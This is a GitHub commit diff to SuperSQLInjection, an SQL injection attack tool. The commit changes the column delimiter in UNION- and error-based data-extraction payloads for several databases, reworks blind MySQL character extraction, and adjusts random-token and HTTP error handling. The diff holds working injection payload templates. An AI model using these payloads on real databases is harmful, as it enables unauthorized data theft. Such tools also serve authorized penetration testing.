Skip to content

Commit c89bc8f

Browse files
shack2shack2
shack2
authored and
shack2
committed
更新分隔符问题
1 parent bbe5a27 commit c89bc8f

10 files changed

Lines changed: 61 additions & 60 deletions

File tree

SuperSQLInjection/Main.cs

Lines changed: 17 additions & 40 deletions
Original file line numberDiff line numberDiff line change
@@ -286,7 +286,7 @@ public void HttpDownloadFile(string url, string path)
286286
responseStream.Close();
287287
}
288288

289-
public static int version = 20200209;
289+
public static int version = 20200527;
290290
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
291291
//检查更新
292292
public void checkUpdate()
@@ -792,10 +792,8 @@ private void StopThread()
792792
this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
793793
stp.Cancel();
794794
this.currentThread.Abort();
795-
796795
}
797796
status = 0;
798-
799797
}
800798

801799
public void getVariablesByUnion(DBType dbType)
@@ -2710,11 +2708,9 @@ public int getValue(String payLoadStr, int start, int end)
27102708
{
27112709
//2分法获取中间数字
27122710
mid = Tools.getLargeNum(start, end);
2713-
27142711
payload = ByPassForBetween(payLoadStr, mid);
27152712
ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
27162713
Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode);
2717-
27182714
if (end == start)
27192715
{
27202716
if (exists)
@@ -2723,9 +2719,7 @@ public int getValue(String payLoadStr, int start, int end)
27232719
}
27242720
else
27252721
{
2726-
27272722
return end;
2728-
27292723
}
27302724
}
27312725
if (exists)
@@ -5141,47 +5135,21 @@ public void getDataValueByBoolByMySQL(Object opam)
51415135
String va_payload = MySQL.ver_value.Replace("{data}", data_payload);
51425136
String colvalue = "";
51435137

5144-
//获取值
51455138
for (int i = 1; i <= len; i++)
51465139
{
5147-
String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "");
5148-
String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload);
5149-
int mu_payload_len = 0;
5150-
//MySQL多字节ord,先判断ord后的长度,在取每一个的值
5140+
String tmp_va_payload = va_payload.Replace("{index}", i + "");
5141+
int ascii = 0;
51515142
if (config.keyType.Equals(KeyType.Time))
51525143
{
5153-
mu_payload_len = getValue(MySQL.getBoolDataBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8);
5144+
ascii = getValue(tmp_va_payload, 0, 127);
51545145
}
51555146
else
51565147
{
5157-
mu_payload_len = getValue(plen, 2, 8);
5148+
ascii = getValue(tmp_va_payload, 0, 127);
51585149
}
5159-
5160-
//判断ord转换后的字符长度
5161-
5162-
int m_index = 1;
5163-
String[] ver_tmp = new String[mu_payload_len];
5164-
while (m_index <= mu_payload_len)
5165-
{
5166-
5167-
int ascii = 0;
5168-
if (config.keyType.Equals(KeyType.Time))
5169-
{
5170-
ascii = getValue(MySQL.getBoolDataBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9);
5171-
}
5172-
else
5173-
{
5174-
ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9);
5175-
}
5176-
ver_tmp[m_index - 1] = ascii + "";
5177-
m_index++;
5178-
}
5179-
//设置值,这里由于是hex值,需要转换
5180-
String hexstring = Tools.convertToString(ver_tmp);
5181-
String hexvalue = Convert.ToString(int.Parse(hexstring), 16);
5182-
colvalue += Tools.unHex(hexvalue, config.db_encoding);
5183-
5150+
colvalue += ((char)ascii).ToString();
51845151
}
5152+
51855153
if (lvi == null)
51865154
{
51875155
lvi = new ListViewItem(colvalue);
@@ -6043,6 +6011,7 @@ public void getDataValueByErrorBySQLServer(Object opam)
60436011
GetDataPam gp = (GetDataPam)opam;
60446012
ListViewItem lvi = new ListViewItem();
60456013
String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
6014+
60466015
result = HttpUtility.HtmlDecode(result);
60476016
//数结果改成xml格式,单独解析
60486017
addItemToListViewBySQLServerXMLData(result, gp.columns);
@@ -10804,7 +10773,15 @@ private void btn_inject_setTokenLocation_Click(object sender, EventArgs e)
1080410773

1080510774
private void btn_inject_randStr_Click(object sender, EventArgs e)
1080610775
{
10807-
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
10776+
if (this.txt_inject_request.SelectedText.Length > 0)
10777+
{
10778+
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
10779+
10780+
}
10781+
if (this.txt_sencond_request.SelectedText.Length > 0)
10782+
{
10783+
this.txt_sencond_request.SelectedText = "<Rand>" + this.txt_sencond_request.SelectedText + "</Rand>";
10784+
}
1080810785
}
1080910786

1081010787
private void txt_sencond_request_TextChanged(object sender, EventArgs e)

SuperSQLInjection/bypass/StringReplace.cs

Lines changed: 17 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass
1111
{
1212
class StringReplace
1313
{
14-
public static String strReplaceCenter(Config config, String request, Hashtable replaceList)
14+
public static String lastRand = "";
15+
public static String lastpayload = "";
16+
public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload)
1517
{
1618
//修改随机值
17-
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N"));
19+
String rand = "";
20+
if (payload.Equals(lastpayload)) {
21+
rand = lastRand;
22+
}
23+
else {
24+
rand = System.Guid.NewGuid().ToString("N");
25+
}
26+
27+
if (payload.Equals("请求二次注入页面")) {
28+
rand = lastRand;
29+
}
30+
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", rand);
31+
lastRand = rand;
32+
lastpayload = payload;
1833
//找到需要处理的字符
1934
MatchCollection mc = Regex.Matches(request, "(?<=(\\<Encode\\>))[.\\s\\S]*?(?=(\\<\\/Encode\\>))");
2035
String str="";

SuperSQLInjection/payload/Comm.cs

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -8,8 +8,8 @@ namespace SuperSQLInjection.payload
88
class Comm
99
{
1010

11-
public const String COLUMNS_SPLIT_STR = "$_$";
12-
public const String COLUMNS_REG_SPLIT_STR = "\\$_\\$";
11+
public const String COLUMNS_SPLIT_STR = "$\t$";
12+
public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$";
1313

1414
public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8");
1515
public static String exists_table = " exists(select 1 from {0})";

SuperSQLInjection/payload/DB2.cs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -82,7 +82,7 @@ public static String unionColumns(List<String> columns, String unionStr)
8282

8383
public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
8484
{
85-
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
85+
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
8686
String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
8787
return union_value.Replace("{data}", template);
8888
}

SuperSQLInjection/payload/Informix.cs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -38,7 +38,7 @@ class Informix
3838

3939
public static String substr = "substr(({data})),{index},1)";
4040
//多字节
41-
public static String hex_value = "ascii({data})";
41+
//public static String hex_value = "ascii({data})";
4242

4343
//bool方式字符长度判断
4444
public static String bool_length = " length(({data}))>{len}";

SuperSQLInjection/payload/Oracle.cs

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -91,7 +91,7 @@ public static String getUnionDataValue(int columnsLen, int showIndex, String dat
9191
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
9292
{
9393
StringBuilder sb = new StringBuilder();
94-
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
94+
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
9595
for (int i = 1; i <= columnsLen; i++)
9696
{
9797
if (i == showIndex)
@@ -163,7 +163,7 @@ public static String getBoolDataPayLoad(String column, String dbName, String tab
163163
public static String getDataValue(List<String> columns, String dbName, String table, String index)
164164
{
165165
StringBuilder sb = new StringBuilder();
166-
String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
166+
String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||");
167167
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
168168
sb.Append(",");
169169
sb.Remove(sb.Length - 1, 1);

SuperSQLInjection/payload/PostgreSQL.cs

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -81,7 +81,7 @@ class PostgreSQL
8181
//error方式
8282
public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)";
8383

84-
public static String hex = "(select hex({data}))";
84+
//public static String hex = "(select hex({data}))";
8585
public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
8686

8787
public static String substr_value = "(select substr({data},{start},{len}))";
@@ -126,7 +126,7 @@ public static String getBoolCountBySleep(String data, int maxTime)
126126
/// <param name="index">第几行数据,1开始</param>
127127
public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
128128
{
129-
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
129+
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"));
130130
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
131131
return error_value.Replace("{data}", d);
132132
}
@@ -179,7 +179,7 @@ public static String getUnionDataValue(int columnsLen, int showIndex, String dat
179179
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
180180
{
181181
StringBuilder sb = new StringBuilder();
182-
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
182+
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
183183
for (int i = 1; i <= columnsLen; i++)
184184
{
185185
if (i == showIndex)

SuperSQLInjection/payload/SQLite.cs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -52,7 +52,7 @@ class SQLite
5252
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
5353
{
5454
StringBuilder sb = new StringBuilder();
55-
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
55+
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)";
5656
for (int i = 1; i <= columnsLen; i++)
5757
{
5858
if (i == showIndex)

SuperSQLInjection/tools/Tools.cs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -498,7 +498,7 @@ public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyTy
498498

499499

500500
case KeyType.Time:
501-
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
501+
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
502502
int time = Tools.convertToInt(key);
503503
if (server.runTime > (time*1000-(time*deviation)))
504504
{

SuperSQLInjection/tools/http/HTTP.cs

Lines changed: 16 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -42,7 +42,7 @@ public class HTTP
4242
public const int WaitTime = 5;
4343
public static Main main = null;
4444
public static long index = 0;
45-
45+
public static String LastToken ="";
4646
public const String Socks5ProxyType = "Socks5";
4747

4848
public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED";
@@ -82,6 +82,7 @@ public static ServerInfo sendRequestRetry(Boolean isSSL, int tryCount, String ho
8282
{
8383
ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet);
8484
token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr);
85+
8586
}
8687
request = Regex.Replace(request, "(\\<Token\\>[.\\s\\S]*?\\<\\/Token\\>)", token);
8788
}
@@ -338,7 +339,7 @@ private static ServerInfo sendHTTPRequest(int count, String host, int port, Stri
338339
if (port > 0 && port <= 65556)
339340
{
340341
request = request.Replace(Main.setInjectStr, payload);
341-
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
342+
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
342343
//编码处理
343344
server.request = request;
344345

@@ -483,11 +484,15 @@ private static ServerInfo sendHTTPRequest(int count, String host, int port, Stri
483484
return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
484485
}
485486

487+
}
488+
//超时
489+
if (server.code >501&&server.code <505)
490+
{
491+
throw new Exception("http访问异常-code:"+ server.code+"!");
486492
}
487493

488-
489-
//根据请求头解析
490-
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
494+
//根据请求头解析
495+
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
491496
{
492497
int length = int.Parse(server.headers[Content_Length]);
493498
while (sum < length && sw.ElapsedMilliseconds <= timeout)
@@ -764,7 +769,7 @@ private static ServerInfo sendHTTPSRequest(int count, String host, int port, Str
764769
request = request.Replace(Main.setInjectStr, payload);
765770

766771
//编码处理
767-
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
772+
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
768773
TimeOutSocket tos = new TimeOutSocket();
769774
if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2)
770775
{
@@ -920,7 +925,11 @@ private static ServerInfo sendHTTPSRequest(int count, String host, int port, Str
920925

921926

922927
}
923-
928+
//超时
929+
if (server.code > 501 && server.code < 505)
930+
{
931+
throw new Exception("http访问异常-code:" + server.code + "!");
932+
}
924933

925934
//根据请求头解析
926935
if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)

0 commit comments

Comments
 (0)